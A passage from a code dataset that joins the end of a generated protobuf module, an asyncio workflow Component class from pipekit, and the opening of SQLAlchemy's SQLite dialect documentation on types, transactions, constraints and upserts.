message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='sort', full_name='next_builder.StoryboardNode.sort', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='type', full_name='next_builder.StoryboardNode.type', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='brick', full_name='next_builder.StoryboardNode.brick', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='route', full_name='next_builder.StoryboardNode.route', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='project', full_name='next_builder.StoryboardNode.project', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='parent', full_name='next_builder.StoryboardNode.parent', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='children', full_name='next_builder.StoryboardNode.children', index=11,
number=12, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=212,
serialized_end=572,
)
_STORYBOARDNODE.fields_by_name['brick'].message_type = container__sdk_dot_model_dot_next__builder_dot_storyboard__brick__pb2._STORYBOARDBRICK
_STORYBOARDNODE.fields_by_name['route'].message_type = container__sdk_dot_model_dot_next__builder_dot_storyboard__route__pb2._STORYBOARDROUTE
_STORYBOARDNODE.fields_by_name['project'].message_type = container__sdk_dot_model_dot_next__builder_dot_micro__app__project__pb2._MICROAPPPROJECT
_STORYBOARDNODE.fields_by_name['parent'].message_type = _STORYBOARDNODE
_STORYBOARDNODE.fields_by_name['children'].message_type = _STORYBOARDNODE
DESCRIPTOR.message_types_by_name['StoryboardNode'] = _STORYBOARDNODE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
StoryboardNode = _reflection.GeneratedProtocolMessageType('StoryboardNode', (_message.Message,), {
'DESCRIPTOR' : _STORYBOARDNODE,
'__module__' : 'storyboard_node_pb2'
# @@protoc_insertion_point(class_scope:next_builder.StoryboardNode)
})
_sym_db.RegisterMessage(StoryboardNode)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| 52.987342 | 992 | 0.774845 | [
"Apache-2.0"
] | easyopsapis/easyops-api-python | container_sdk/model/next_builder/storyboard_node_pb2.py | 8,372 | Python |
#!/usr/bin/env python3
import asyncio
import logging
from collections import defaultdict
from functools import partial
from box import Box
_l = logging.getLogger(__name__)
_instances = dict()
_events = defaultdict(asyncio.Event)
_event_queues = list()
_event_callbacks = defaultdict(list)
class Component:
"""A stateful element in a workflow that can be configured, run, and uniquely named."""
def __init__(self, *args, id=None, workflow=None, parent=None, logger=_l, **kwargs):
self.id = id
if id:
key = (type(self), id)
if key in _instances:
raise ValueError(
f'{key[0].__name__} with ID "{id}" already exists: {_instances[key]}')
_instances[key] = self
self.workflow = workflow
self.parent = parent
self.children = list()
if parent:
parent.children.append(self)
self.logger = logger
self.loop = asyncio.get_event_loop()
self._event_lock = set()
self._debug = {'events'}
self._settings = Box(self.configure(**kwargs) or dict())
if not workflow:
workflow = self
settings = [f'{k}={v}' for k, v in workflow.safe_settings(self._settings).items()]
self.debug(f'Initialized {" ".join(settings)}')
def configure(self, **settings):
return settings
def settings(self, **override):
return Box(self._settings, **override)
def safe_settings(self, settings):
return settings
@property
def type(self):
return type(self).__name__
@property
def status(self):
return getattr(self, '_status', None)
@status.setter
def status(self, status):
if not (self.hasstatus(status) or status in self._event_lock):
self._event_lock.add(status)
try:
self._status_setter(status)
finally:
self._event_lock.remove(status)
_dependent_statuses = {'processing-finished', 'finished', 'exited'}
def _status_setter(self, status):
event = status if isinstance(status, ComponentEvent) else ComponentEvent(status, self)
if event.status in self._dependent_statuses:
children = set(filter(lambda c: isinstance(c, Component), self.children))
ready = set(filter(lambda c: c.hasstatus(event.status), children))
if len(children) > len(ready):
if 'events' in self._debug:
pending = ", ".join(c.id for c in children.difference(ready))
self.debug(f'Status "{event.status}" waiting on {pending}')
return
if self.hasstatus('aborted') and event.status != 'exited':
if 'events' in self._debug:
self.debug(f'Ignoring status "{event.status}" because the component is '
'in aborted state')
return
# event.id = self._fqevent(status)
if 'events' in self._debug:
self.debug(f'Emitting event "{event.id}"')
self._status = event.status
_events[event.id].set()
for queue in _event_queues:
queue.put_nowait(event)
if self.parent and event.status != 'aborted' and not isinstance(self, LocalEvents):
self.parent.status = event.status
for callback in _event_callbacks[event.id]:
asyncio.ensure_future(callback())
_event_callbacks[event.id].clear()
def hasstatus(self, status):
"""Return `True` if given status was set."""
if isinstance(status, ComponentEvent):
event = status.id
elif ':' in status:
event = status
else:
event = ComponentEvent(status, self).id
return _events[event].is_set()
async def waiton(self, event):
if 'events' in self._debug:
self.debug(f'Waiting on event "{event}"')
await _events[event].wait()
if 'events' in self._debug:
self.debug(f'Received event "{event}"')
@property
def running(self):
"""Return `True` if in one of the running states."""
if not self.stopped:
for status in ['started', 'running']:
if self.hasstatus(status):
return True
@property
def stopped(self):
"""Return `True` if in one of the stopped states."""
for status in ['aborted', 'finished']:
if self.hasstatus(status):
return True
@property
def aborted(self):
"""Return `True` if the aborted event was emitted."""
return self.hasstatus('aborted')
def start(self):
self.status = 'started'
return self.run()
def stop(self):
self.debug('Stopping')
def abort(self, exception=None):
if self.hasstatus('aborted'):
return
self.status = ComponentEvent('aborted', self, exception)
for child in self.children:
if child.settings().get('error-propagation') in ('none', 'up'):
if 'events' in self._debug:
self.debug(f'Suppressing error propagation to child {child.id}')
elif not child.hasstatus('aborted'):
if 'events' in self._debug:
self.debug(f'Propagating error to child {child.id}')
child.abort()
if self.parent:
if self.parent.settings().get('error-propagation') in ('none', 'down'):
if 'events' in self._debug:
self.debug(f'Suppressing error propagation to parent {self.parent.id}')
elif not self.parent.hasstatus('aborted'):
if 'events' in self._debug:
self.debug(f'Propagating error to parent {self.parent.id}')
self.parent.abort(exception)
def __getattr__(self, name):
if name not in ('critical', 'error', 'warning', 'info', 'debug', 'exception'):
raise AttributeError(f"'{self.type}' object has no attribute '{name}'")
return partial(self._proxied_logging_method, name)
def _proxied_logging_method(self, method, *args, **kwargs):
if method == 'debug':
if logging in (self.workflow or self).settings():
debug = (self.workflow or self).settings().logging.debug
else:
debug = []
if not ('all' in debug or self.type in debug or (self.id in debug)):
return lambda *a, **kw: None
return getattr(self.logger, method)(*self._log_formatted(*args), **kwargs)
def _log_formatted(self, msg, *args):
"""Return the msg prefixed with this component's ID and type."""
prefix = f'{self.id} ' if self.id else ''
msg = f'{prefix}({self.type}) {msg}'
return (msg,) + args
async def run(self):
self.status = 'running'
async def try_while_running(self, callable, timeout=0.5):
"""Return result of `callable`, or raise `ComponentInterrupted` if component is stopped."""
while self.running:
coro = callable()
try:
return await asyncio.wait_for(coro, timeout)
except asyncio.TimeoutError:
pass
raise ComponentInterrupted
class ComponentEvent:
def __init__(self, status, component, exception=None):
self.status = status
self.component = component
self.exception = exception
@property
def id(self):
"""Return a fully qualified ID string representing this event."""
return f'{self.component.id}:{self.status}'
class LocalEvents:
pass
class ComponentInterrupted(Exception):
pass
def get_event_listener():
"""Return a new `Queue` object that will see all events."""
queue = asyncio.Queue()
_event_queues.append(queue)
return queue
def add_event_callback(event, callable, *args, **kwargs):
"""Register a callback that will be called upon the given event."""
_event_callbacks[event].append(partial(callable, *args, **kwargs))
| 33.524793 | 99 | 0.590903 | [
"MIT"
] | DrDub/pipekit | pipekit/component.py | 8,113 | Python |
# sqlite/base.py
# Copyright (C) 2005-2022 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
r"""
.. dialect:: sqlite
:name: SQLite
:full_support: 3.21, 3.28+
:normal_support: 3.12+
:best_effort: 3.7.16+
.. _sqlite_datetime:
Date and Time Types
-------------------
SQLite does not have built-in DATE, TIME, or DATETIME types, and pysqlite does
not provide out of the box functionality for translating values between Python
`datetime` objects and a SQLite-supported format. SQLAlchemy's own
:class:`~sqlalchemy.types.DateTime` and related types provide date formatting
and parsing functionality when SQLite is used. The implementation classes are
:class:`_sqlite.DATETIME`, :class:`_sqlite.DATE` and :class:`_sqlite.TIME`.
These types represent dates and times as ISO formatted strings, which also
nicely support ordering. There's no reliance on typical "libc" internals for
these functions so historical dates are fully supported.
Ensuring Text affinity
^^^^^^^^^^^^^^^^^^^^^^
The DDL rendered for these types is the standard ``DATE``, ``TIME``
and ``DATETIME`` indicators. However, custom storage formats can also be
applied to these types. When the
storage format is detected as containing no alpha characters, the DDL for
these types is rendered as ``DATE_CHAR``, ``TIME_CHAR``, and ``DATETIME_CHAR``,
so that the column continues to have textual affinity.
.. seealso::
`Type Affinity <https://www.sqlite.org/datatype3.html#affinity>`_ -
in the SQLite documentation
.. _sqlite_autoincrement:
SQLite Auto Incrementing Behavior
----------------------------------
Background on SQLite's autoincrement is at: https://sqlite.org/autoinc.html
Key concepts:
* SQLite has an implicit "auto increment" feature that takes place for any
non-composite primary-key column that is specifically created using
"INTEGER PRIMARY KEY" for the type + primary key.
* SQLite also has an explicit "AUTOINCREMENT" keyword, that is **not**
equivalent to the implicit autoincrement feature; this keyword is not
recommended for general use. SQLAlchemy does not render this keyword
unless a special SQLite-specific directive is used (see below). However,
it still requires that the column's type is named "INTEGER".
Using the AUTOINCREMENT Keyword
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
To specifically render the AUTOINCREMENT keyword on the primary key column
when rendering DDL, add the flag ``sqlite_autoincrement=True`` to the Table
construct::
Table('sometable', metadata,
Column('id', Integer, primary_key=True),
sqlite_autoincrement=True)
Allowing autoincrement behavior SQLAlchemy types other than Integer/INTEGER
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SQLite's typing model is based on naming conventions. Among other things, this
means that any type name which contains the substring ``"INT"`` will be
determined to be of "integer affinity". A type named ``"BIGINT"``,
``"SPECIAL_INT"`` or even ``"XYZINTQPR"``, will be considered by SQLite to be
of "integer" affinity. However, **the SQLite autoincrement feature, whether
implicitly or explicitly enabled, requires that the name of the column's type
is exactly the string "INTEGER"**. Therefore, if an application uses a type
like :class:`.BigInteger` for a primary key, on SQLite this type will need to
be rendered as the name ``"INTEGER"`` when emitting the initial ``CREATE
TABLE`` statement in order for the autoincrement behavior to be available.
One approach to achieve this is to use :class:`.Integer` on SQLite
only using :meth:`.TypeEngine.with_variant`::
table = Table(
"my_table", metadata,
Column("id", BigInteger().with_variant(Integer, "sqlite"), primary_key=True)
)
Another is to use a subclass of :class:`.BigInteger` that overrides its DDL
name to be ``INTEGER`` when compiled against SQLite::
from sqlalchemy import BigInteger
from sqlalchemy.ext.compiler import compiles
class SLBigInteger(BigInteger):
pass
@compiles(SLBigInteger, 'sqlite')
def bi_c(element, compiler, **kw):
return "INTEGER"
@compiles(SLBigInteger)
def bi_c(element, compiler, **kw):
return compiler.visit_BIGINT(element, **kw)
table = Table(
"my_table", metadata,
Column("id", SLBigInteger(), primary_key=True)
)
.. seealso::
:meth:`.TypeEngine.with_variant`
:ref:`sqlalchemy.ext.compiler_toplevel`
`Datatypes In SQLite Version 3 <https://sqlite.org/datatype3.html>`_
.. _sqlite_concurrency:
Database Locking Behavior / Concurrency
---------------------------------------
SQLite is not designed for a high level of write concurrency. The database
itself, being a file, is locked completely during write operations within
transactions, meaning exactly one "connection" (in reality a file handle)
has exclusive access to the database during this period - all other
"connections" will be blocked during this time.
The Python DBAPI specification also calls for a connection model that is
always in a transaction; there is no ``connection.begin()`` method,
only ``connection.commit()`` and ``connection.rollback()``, upon which a
new transaction is to be begun immediately. This may seem to imply
that the SQLite driver would in theory allow only a single filehandle on a
particular database file at any time; however, there are several
factors both within SQLite itself as well as within the pysqlite driver
which loosen this restriction significantly.
However, no matter what locking modes are used, SQLite will still always
lock the database file once a transaction is started and DML (e.g. INSERT,
UPDATE, DELETE) has at least been emitted, and this will block
other transactions at least at the point that they also attempt to emit DML.
By default, the length of time on this block is very short before it times out
with an error.
This behavior becomes more critical when used in conjunction with the
SQLAlchemy ORM. SQLAlchemy's :class:`.Session` object by default runs
within a transaction, and with its autoflush model, may emit DML preceding
any SELECT statement. This may lead to a SQLite database that locks
more quickly than is expected. The locking mode of SQLite and the pysqlite
driver can be manipulated to some degree, however it should be noted that
achieving a high degree of write-concurrency with SQLite is a losing battle.
For more information on SQLite's lack of write concurrency by design, please
see
`Situations Where Another RDBMS May Work Better - High Concurrency
<https://www.sqlite.org/whentouse.html>`_ near the bottom of the page.
The following subsections introduce areas that are impacted by SQLite's
file-based architecture and additionally will usually require workarounds to
work when using the pysqlite driver.
.. _sqlite_isolation_level:
Transaction Isolation Level / Autocommit
----------------------------------------
SQLite supports "transaction isolation" in a non-standard way, along two
axes. One is that of the
`PRAGMA read_uncommitted <https://www.sqlite.org/pragma.html#pragma_read_uncommitted>`_
instruction. This setting can essentially switch SQLite between its
default mode of ``SERIALIZABLE`` isolation, and a "dirty read" isolation
mode normally referred to as ``READ UNCOMMITTED``.
SQLAlchemy ties into this PRAGMA statement using the
:paramref:`_sa.create_engine.isolation_level` parameter of
:func:`_sa.create_engine`.
Valid values for this parameter when used with SQLite are ``"SERIALIZABLE"``
and ``"READ UNCOMMITTED"`` corresponding to a value of 0 and 1, respectively.
SQLite defaults to ``SERIALIZABLE``, however its behavior is impacted by
the pysqlite driver's default behavior.
When using the pysqlite driver, the ``"AUTOCOMMIT"`` isolation level is also
available, which will alter the pysqlite connection using the ``.isolation_level``
attribute on the DBAPI connection and set it to None for the duration
of the setting.
.. versionadded:: 1.3.16 added support for SQLite AUTOCOMMIT isolation level
when using the pysqlite / sqlite3 SQLite driver.
The other axis along which SQLite's transactional locking is impacted is
via the nature of the ``BEGIN`` statement used. The three varieties
are "deferred", "immediate", and "exclusive", as described at
`BEGIN TRANSACTION <https://sqlite.org/lang_transaction.html>`_. A straight
``BEGIN`` statement uses the "deferred" mode, where the database file is
not locked until the first read or write operation, and read access remains
open to other transactions until the first write operation. But again,
it is critical to note that the pysqlite driver interferes with this behavior
by *not even emitting BEGIN* until the first write operation.
.. warning::
SQLite's transactional scope is impacted by unresolved
issues in the pysqlite driver, which defers BEGIN statements to a greater
degree than is often feasible. See the section :ref:`pysqlite_serializable`
for techniques to work around this behavior.
.. seealso::
:ref:`dbapi_autocommit`
SAVEPOINT Support
----------------------------
SQLite supports SAVEPOINTs, which only function once a transaction is
begun. SQLAlchemy's SAVEPOINT support is available using the
:meth:`_engine.Connection.begin_nested` method at the Core level, and
:meth:`.Session.begin_nested` at the ORM level. However, SAVEPOINTs
won't work at all with pysqlite unless workarounds are taken.
.. warning::
SQLite's SAVEPOINT feature is impacted by unresolved
issues in the pysqlite driver, which defers BEGIN statements to a greater
degree than is often feasible. See the section :ref:`pysqlite_serializable`
for techniques to work around this behavior.
Transactional DDL
----------------------------
The SQLite database supports transactional :term:`DDL` as well.
In this case, the pysqlite driver is not only failing to start transactions,
it also is ending any existing transaction when DDL is detected, so again,
workarounds are required.
.. warning::
SQLite's transactional DDL is impacted by unresolved issues
in the pysqlite driver, which fails to emit BEGIN and additionally
forces a COMMIT to cancel any transaction when DDL is encountered.
See the section :ref:`pysqlite_serializable`
for techniques to work around this behavior.
.. _sqlite_foreign_keys:
Foreign Key Support
-------------------
SQLite supports FOREIGN KEY syntax when emitting CREATE statements for tables,
however by default these constraints have no effect on the operation of the
table.
Constraint checking on SQLite has three prerequisites:
* At least version 3.6.19 of SQLite must be in use
* The SQLite library must be compiled *without* the SQLITE_OMIT_FOREIGN_KEY
or SQLITE_OMIT_TRIGGER symbols enabled.
* The ``PRAGMA foreign_keys = ON`` statement must be emitted on all
connections before use -- including the initial call to
:meth:`sqlalchemy.schema.MetaData.create_all`.
SQLAlchemy allows for the ``PRAGMA`` statement to be emitted automatically for
new connections through the usage of events::
from sqlalchemy.engine import Engine
from sqlalchemy import event
@event.listens_for(Engine, "connect")
def set_sqlite_pragma(dbapi_connection, connection_record):
cursor = dbapi_connection.cursor()
cursor.execute("PRAGMA foreign_keys=ON")
cursor.close()
.. warning::
When SQLite foreign keys are enabled, it is **not possible**
to emit CREATE or DROP statements for tables that contain
mutually-dependent foreign key constraints;
to emit the DDL for these tables requires that ALTER TABLE be used to
create or drop these constraints separately, for which SQLite has
no support.
.. seealso::
`SQLite Foreign Key Support <https://www.sqlite.org/foreignkeys.html>`_
- on the SQLite web site.
:ref:`event_toplevel` - SQLAlchemy event API.
:ref:`use_alter` - more information on SQLAlchemy's facilities for handling
mutually-dependent foreign key constraints.
.. _sqlite_on_conflict_ddl:
ON CONFLICT support for constraints
-----------------------------------
.. seealso:: This section describes the :term:`DDL` version of "ON CONFLICT" for
SQLite, which occurs within a CREATE TABLE statement. For "ON CONFLICT" as
applied to an INSERT statement, see :ref:`sqlite_on_conflict_insert`.
SQLite supports a non-standard DDL clause known as ON CONFLICT which can be applied
to primary key, unique, check, and not null constraints. In DDL, it is
rendered either within the "CONSTRAINT" clause or within the column definition
itself depending on the location of the target constraint. To render this
clause within DDL, the extension parameter ``sqlite_on_conflict`` can be
specified with a string conflict resolution algorithm within the
:class:`.PrimaryKeyConstraint`, :class:`.UniqueConstraint`,
:class:`.CheckConstraint` objects. Within the :class:`_schema.Column` object,
there
are individual parameters ``sqlite_on_conflict_not_null``,
``sqlite_on_conflict_primary_key``, ``sqlite_on_conflict_unique`` which each
correspond to the three types of relevant constraint types that can be
indicated from a :class:`_schema.Column` object.
.. seealso::
`ON CONFLICT <https://www.sqlite.org/lang_conflict.html>`_ - in the SQLite
documentation
.. versionadded:: 1.3
The ``sqlite_on_conflict`` parameters accept a string argument which is just
the resolution name to be chosen, which on SQLite can be one of ROLLBACK,
ABORT, FAIL, IGNORE, and REPLACE. For example, to add a UNIQUE constraint
that specifies the IGNORE algorithm::
some_table = Table(
'some_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', Integer),
UniqueConstraint('id', 'data', sqlite_on_conflict='IGNORE')
)
The above renders CREATE TABLE DDL as::
CREATE TABLE some_table (
id INTEGER NOT NULL,
data INTEGER,
PRIMARY KEY (id),
UNIQUE (id, data) ON CONFLICT IGNORE
)
When using the :paramref:`_schema.Column.unique`
flag to add a UNIQUE constraint
to a single column, the ``sqlite_on_conflict_unique`` parameter can
be added to the :class:`_schema.Column` as well, which will be added to the
UNIQUE constraint in the DDL::
some_table = Table(
'some_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', Integer, unique=True,
sqlite_on_conflict_unique='IGNORE')
)
rendering::
CREATE TABLE some_table (
id INTEGER NOT NULL,
data INTEGER,
PRIMARY KEY (id),
UNIQUE (data) ON CONFLICT IGNORE
)
To apply the FAIL algorithm for a NOT NULL constraint,
``sqlite_on_conflict_not_null`` is used::
some_table = Table(
'some_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', Integer, nullable=False,
sqlite_on_conflict_not_null='FAIL')
)
this renders the column inline ON CONFLICT phrase::
CREATE TABLE some_table (
id INTEGER NOT NULL,
data INTEGER NOT NULL ON CONFLICT FAIL,
PRIMARY KEY (id)
)
Similarly, for an inline primary key, use ``sqlite_on_conflict_primary_key``::
some_table = Table(
'some_table', metadata,
Column('id', Integer, primary_key=True,
sqlite_on_conflict_primary_key='FAIL')
)
SQLAlchemy renders the PRIMARY KEY constraint separately, so the conflict
resolution algorithm is applied to the constraint itself::
CREATE TABLE some_table (
id INTEGER NOT NULL,
PRIMARY KEY (id) ON CONFLICT FAIL
)
.. _sqlite_on_conflict_insert:
INSERT...ON CONFLICT (Upsert)
-----------------------------------
.. seealso:: This section describes the :term:`DML` version of "ON CONFLICT" for
SQLite, which occurs within an INSERT statement. For "ON CONFLICT" as
applied to a CREATE TABLE statement, see :ref:`sqlite_on_conflict_ddl`.
From version 3.24.0 onwards, SQLite supports "upserts" (update or insert)
of rows into a table via the ``ON CONFLICT`` clause of the ``INSERT``
statement. A candidate row will only be inserted if that row does not violate
any unique or primary key constraints. In the case of a unique constraint violation, a
secondary action can occur which can be either "DO UPDATE", indicating that
the data in the target row should be updated, or "DO NOTHING", which indicates
to silently skip this row.
Conflicts are determined using columns that are part of existing unique
constraints and indexes. These constraints are identified by stating the
columns and conditions that comprise the indexes.
SQLAlchemy provides ``ON CONFLICT`` support via the SQLite-specific
:func:`_sqlite.insert()` function, which provides
the generative methods :meth:`_sqlite.Insert.on_conflict_do_update`
and :meth:`_sqlite.Insert.on_conflict_do_nothing`:
.. sourcecode:: pycon+sql
>>> from sqlalchemy.dialects.sqlite import insert
>>> insert_stmt = insert(my_table).values(
... id='some_existing_id',
... data='inserted value')
>>> do_update_stmt = insert_stmt.on_conflict_do_update(
... index_elements=['id'],
... set_=dict(data='updated value')
... )
>>> print(do_update_stmt)
{opensql}INSERT INTO my_table (id, data) VALUES (?, ?)
ON CONFLICT (id) DO UPDATE SET data = ?{stop}
>>> do_nothing_stmt = insert_stmt.on_conflict_do_nothing(
... index_elements=['id']
... )
>>> print(do_nothing_stmt)
{opensql}INSERT INTO my_table (id, data) VALUES (?, ?)
ON CONFLICT (id) DO NOTHING
.. versionadded:: 1.4
.. seealso::
`Upsert
<https://sqlite.org/lang_UPSERT.html>`_
- in the SQLite documentation.
Specifying the Target
^^^^^^^^^^^^^^^^^^^^^
Both methods supply the "target" of the conflict using column inference:
* The :paramref:`_sqlite.Insert.on_conflict_do_update.index_elements` argument
specifies a sequence containing string column names, :class:`_schema.Column`
objects, and/or SQL expression elements, which would identify a unique index
or unique constraint.
* When using :paramref:`_sqlite.Insert.on_conflict_do_update.index_elements`
to infer an index, a partial index can be inferred by also specifying the
:paramref:`_sqlite.Insert.on_conflict_do_update.index_where` parameter:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(user_email='[email protected]', data='inserted data')
>>> do_update_stmt = stmt.on_conflict_do_update(
... index_elements=[my_table.c.user_email],
... index_where=my_table.c.user_email.like('%@gmail.com'),
... set_=dict(data=stmt.excluded.data)
... )
>>> print(do_update_stmt)
{opensql}INSERT INTO my_table (data, user_email) VALUES (?, ?)
ON CONFLICT (user_email)
WHERE user_email LIKE '%@gmail.com'
DO UPDATE SET data = excluded.data
>>>
The SET Clause
^^^^^^^^^^^^^^^
``ON CONFLICT...DO UPDATE`` is used to perform an update of the already
existing row, using any combination of new values as well as values
from the proposed insertion. These values are specified using the
:paramref:`_sqlite.Insert.on_conflict_do_update.set_` parameter. This
parameter accepts a dictionary which consists of direct values
for UPDATE:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(id='some_id', data='inserted value')
>>> do_update_stmt = stmt.on_conflict_do_update(
... index_elements=['id'],
... set_=dict(data='updated value')
... )
>>> print(do_update_stmt)
{opensql}INSERT INTO my_table (id, data) VALUES (?, ?)
ON CONFLICT (id) DO UPDATE SET data = ?
.. warning::
The :meth:`_sqlite.Insert.on_conflict_do_update` method does **not** take
into account Python-side default UPDATE values or generation functions,
e.g. those specified using :paramref:`_schema.Column.onupdate`. These
values will not be exercised for an ON CONFLICT style of UPDATE, unless
they are manually specified in the
:paramref:`_sqlite.Insert.on_conflict_do_update.set_` dictionary.
Updating using the Excluded INSERT Values
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
In order to refer to the proposed insertion row, the special alias
:attr:`~.sqlite.Insert.excluded` is available as an attribute on
the :class:`_sqlite.Insert` object; this object creates an "excluded." prefix
on a column, that informs the DO UPDATE to update the row with the value that
would have been inserted had the constraint not failed:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(
... id='some_id',
... data='inserted value',
... author='jlh'
... )
>>> do_update_stmt = stmt.on_conflict_do_update(
... index_elements=['id'],
... set_=dict(data='updated value', author=stmt.excluded.author)
... )
>>> print(do_update_stmt)
{opensql}INSERT INTO my_table (id, data, author) VALUES (?, ?, ?)
ON CONFLICT (id) DO UPDATE SET data = ?, author = excluded.author
Additional WHERE Criteria
^^^^^^^^^^^^^^^^^^^^^^^^^
The :meth:`_sqlite.Insert.on_conflict_do_update` method also accepts
a WHERE clause using the :paramref:`_sqlite.Insert.on_conflict_do_update.where`
parameter, which will limit those rows which receive an UPDATE:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(
... id='some_id',
... data='inserted value',
... author='jlh'
... )
>>> on_update_stmt = stmt.on_conflict_do_update(
... index_elements=['id'],
... set_=dict(data='updated value', author=stmt.excluded.author),
... where=(my_table.c.status == 2)
... )
>>> print(on_update_stmt)
{opensql}INSERT INTO my_table (id, data, author) VALUES (?, ?, ?)
ON CONFLICT (id) DO UPDATE SET data = ?, author = excluded.author
WHERE my_table.status = ?
Skipping Rows with DO NOTHING
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
``ON CONFLICT`` may be used to skip inserting a row entirely
if any conflict with a unique constraint occurs; below this is illustrated
using the :meth:`_sqlite.Insert.on_conflict_do_nothing` method:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(id='some_id', data='inserted value')
>>> stmt = stmt.on_conflict_do_nothing(index_elements=['id'])
>>> print(stmt)
{opensql}INSERT INTO my_table (id, data) VALUES (?, ?) ON CONFLICT (id) DO NOTHING
If ``DO NOTHING`` is used without specifying any columns or constraint,
it has the effect of skipping the INSERT for any unique violation which
occurs:
.. sourcecode:: pycon+sql
>>> stmt = insert(my_table).values(id='some_id', data='inserted value')
>>> stmt = stmt.on_conflict_do_nothing()
>>> print(stmt)
{opensql}INSERT INTO my_table (id, data) VALUES (?, ?) ON CONFLICT DO NOTHING
.. _sqlite_type_reflection:
Type Reflection
---------------
SQLite types are unlike those of most other database backends, in that
the string name of the type usually does not correspond to a "type" in a
one-to-one fashion. Instead, SQLite links per-column typing behavior
to one of five so-called "type affinities" based on a string matching
pattern for the type.
SQLAlchemy's reflection process, when inspecting types, uses a simple
lookup table to link the keywords returned to provided SQLAlchemy types.
This lookup table is present within the SQLite dialect as it is for all
other dialects. However, the SQLite dialect has a different "fallback"
routine for when a particular type name is not located in the lookup map;
it instead implements the SQLite "type affinity" scheme located at
https://www.sqlite.org/datatype3.html section 2.1.
The provided typemap will make direct associations from an exact string
name match for the following types:
:class:`_types.BIGINT`, :class:`_types.BLOB`,
:class:`_types.BOOLEAN`, :class:`_types.BOOLEAN`,
:class:`_types.CHAR`, :class:`_types.DATE`,
:class:`_types.DATETIME`, :class:`_types.FLOAT`,
:class:`_types.DECIMAL`, :class:`_types.FLOAT`,
:class:`_types.INTEGER`, :class:`_types.INTEGER`,
:class:`_types.NUMERIC`, :class:`_types.REAL`,
:class:`_types.SMALLINT`, :class:`_types.TEXT`,
:class:`_types.TIME`, :class:`_types.TIMESTAMP`,
:class:`_types.VARCHAR`, :class:`_types.NVARCHAR`,
:class:`_types.NCHAR`
When a type name does not match one of the above types, the "type affinity"
lookup is used instead:
* :class:`_types.INTEGER` is returned if the type name includes the
string ``INT``
* :class:`_types.TEXT` is returned if the type name includes the
string ``CHAR``, ``CLOB`` or ``TEXT``
* :class:`_types.NullType` is returned if the type name includes the
string ``BLOB``
* :class:`_types.REAL` is returned if the type name includes the string
``REAL``, ``FLOA`` or ``DOUB``.
* Otherwise, the :class:`_types.NUMERIC` type is used.
.. versionadded:: 0.9.3 Support for SQLite type affinity rules when reflecting
columns.
.. _sqlite_partial_index:
Partial Indexes
---------------
A partial index, e.g. one which uses a WHERE clause, can be specified
with the DDL system using the argument ``sqlite_where``::
tbl = Table('testtbl', m, Column('data', Integer))
idx = Index('test_idx1', tbl.c.data,
sqlite_where=and_(tbl.c.data > 5, tbl.c.data < 10))
The index will be rendered at create time as::
CREATE INDEX test_idx1 ON testtbl (data)
WHERE data > 5 AND data < 10
.. versionadded:: 0.9.9
.. _sqlite_dotted_column_names:
Dotted Column Names
-------------------
Using table or column names that explicitly have periods in them is
**not recommended**. While this is generally a bad idea for relational
databases in general, as the dot is a syntactically significant character,
the SQLite driver up until version **3.10.0** of SQLite has a bug which
requires that SQLAlchemy filter out these dots in result sets.
.. versionchanged:: 1.1
The following SQLite issue has been resolved as of version 3.10.0
of SQLite. SQLAlchemy as of **1.1** automatically disables its internal
workarounds based on detection of this version.
The bug, entirely outside of SQLAlchemy, can be illustrated thusly::
import sqlite3
assert sqlite3.sqlite_version_info < (3, 10, 0), "bug is fixed in this version"
conn = sqlite3.connect(":memory:")
cursor = conn.cursor()
cursor.execute("create table x (a integer, b integer)")
cursor.execute("insert into x (a, b) values (1, 1)")
cursor.execute("insert into x (a, b) values (2, 2)")
cursor.execute("select x.a, x.b from x")
